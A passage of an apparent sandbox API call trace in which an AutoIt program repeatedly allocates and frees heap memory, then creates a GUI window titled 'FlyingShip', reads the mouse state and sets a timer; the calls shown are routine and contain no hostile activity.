(in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f350 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26798 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26798 | out: hHeap=0xc60000) returned 1 [0254.665] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe829f8 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26798 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f88 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26778 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f88 | out: hHeap=0xc60000) returned 1 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26778 | out: hHeap=0xc60000) returned 1 [0254.665] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83268 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f88 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26778 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f88 | out: hHeap=0xc60000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe837b8 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f88 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26748 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a120 | out: hHeap=0xc60000) returned 1 [0254.665] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26748 | out: hHeap=0xc60000) returned 1 [0254.665] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe837e0 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0254.665] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26748 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a120 | out: hHeap=0xc60000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83808 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe266d8 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f40 | out: hHeap=0xc60000) returned 1 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266d8 | out: hHeap=0xc60000) returned 1 [0254.666] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83830 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266d8 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f40 | out: hHeap=0xc60000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83858 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26708 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26708 | out: hHeap=0xc60000) returned 1 [0254.666] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83880 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26708 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe838a8 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0254.666] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26768 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0254.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26768 | out: hHeap=0xc60000) returned 1 [0254.667] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe838d0 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26768 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe838f8 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26758 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.667] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83920 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26758 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79be0 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79c40 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26728 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79c40 | out: hHeap=0xc60000) returned 1 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.667] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83948 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79c40 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79c40 | out: hHeap=0xc60000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83970 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79c40 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0254.667] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267c8 [0254.667] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267c8 | out: hHeap=0xc60000) returned 1 [0254.668] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83998 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267c8 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79df0 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d90 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267d8 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d90 | out: hHeap=0xc60000) returned 1 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267d8 | out: hHeap=0xc60000) returned 1 [0254.668] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe839c0 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d90 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267d8 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79da8 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267e8 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267e8 | out: hHeap=0xc60000) returned 1 [0254.668] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe839e8 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267e8 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83a10 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0254.668] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267f8 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0254.668] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267f8 | out: hHeap=0xc60000) returned 1 [0254.669] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83a38 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267f8 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83a60 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6f0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26808 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6f0 | out: hHeap=0xc60000) returned 1 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26808 | out: hHeap=0xc60000) returned 1 [0254.669] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83a88 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6f0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26808 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6f0 | out: hHeap=0xc60000) returned 1 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83ab0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6f0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26818 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26818 | out: hHeap=0xc60000) returned 1 [0254.669] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83ad8 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26818 [0254.669] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed8258 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.669] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26828 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26828 | out: hHeap=0xc60000) returned 1 [0254.670] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83b00 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26828 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83b28 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26838 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26838 | out: hHeap=0xc60000) returned 1 [0254.670] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83b50 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26838 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed8290 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b08 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26848 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b08 | out: hHeap=0xc60000) returned 1 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26848 | out: hHeap=0xc60000) returned 1 [0254.670] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83b78 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b08 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26848 [0254.670] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b08 | out: hHeap=0xc60000) returned 1 [0254.670] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83ba0 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b08 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26858 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26858 | out: hHeap=0xc60000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83bc8 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26858 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83bf0 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26868 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26868 | out: hHeap=0xc60000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83c18 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26868 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83c40 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26878 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a610 | out: hHeap=0xc60000) returned 1 [0254.671] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26878 | out: hHeap=0xc60000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83c68 [0254.671] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26878 [0254.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a610 | out: hHeap=0xc60000) returned 1 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83c90 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a370 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26888 [0254.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a370 | out: hHeap=0xc60000) returned 1 [0254.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26888 | out: hHeap=0xc60000) returned 1 [0254.672] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83cb8 [0254.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a370 [0254.673] AdjustWindowRectEx (in: lpRect=0x87f6b4, dwStyle=0x84c00000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x87f6b4) returned 1 [0254.673] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3 GUI", lpWindowName="FlyingShip", dwStyle=0x84c00000, X=318, Y=92, nWidth=806, nHeight=678, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x50150 [0254.674] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.674] NtdllDialogWndProc_W () returned 0x1 [0254.674] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.674] NtdllDialogWndProc_W () returned 0x0 [0254.674] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.674] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.674] NtdllDialogWndProc_W () returned 0x0 [0254.674] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.675] NtdllDialogWndProc_W () returned 0x0 [0254.675] SetWindowLongW (hWnd=0x50150, nIndex=-21, dwNewLong=0) returned 0 [0254.675] GetClientRect (in: hWnd=0x50150, lpRect=0x87f6b4 | out: lpRect=0x87f6b4) returned 1 [0254.675] GetStockObject (i=17) returned 0x18a0025 [0254.675] SendMessageW (hWnd=0x50150, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0254.675] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.675] NtdllDialogWndProc_W () returned 0x0 [0254.675] GetCursorPos (in: lpPoint=0x87f680 | out: lpPoint=0x87f680*(x=778, y=503)) returned 1 [0254.675] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f680 | out: lpPoint=0x87f680) returned 1 [0254.675] GetAsyncKeyState (vKey=1) returned 0 [0254.675] GetAsyncKeyState (vKey=2) returned 0 [0254.675] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x28, lpTimerFunc=0x291256) returned 0x7fdb [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764a0 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764b8 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76488 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: 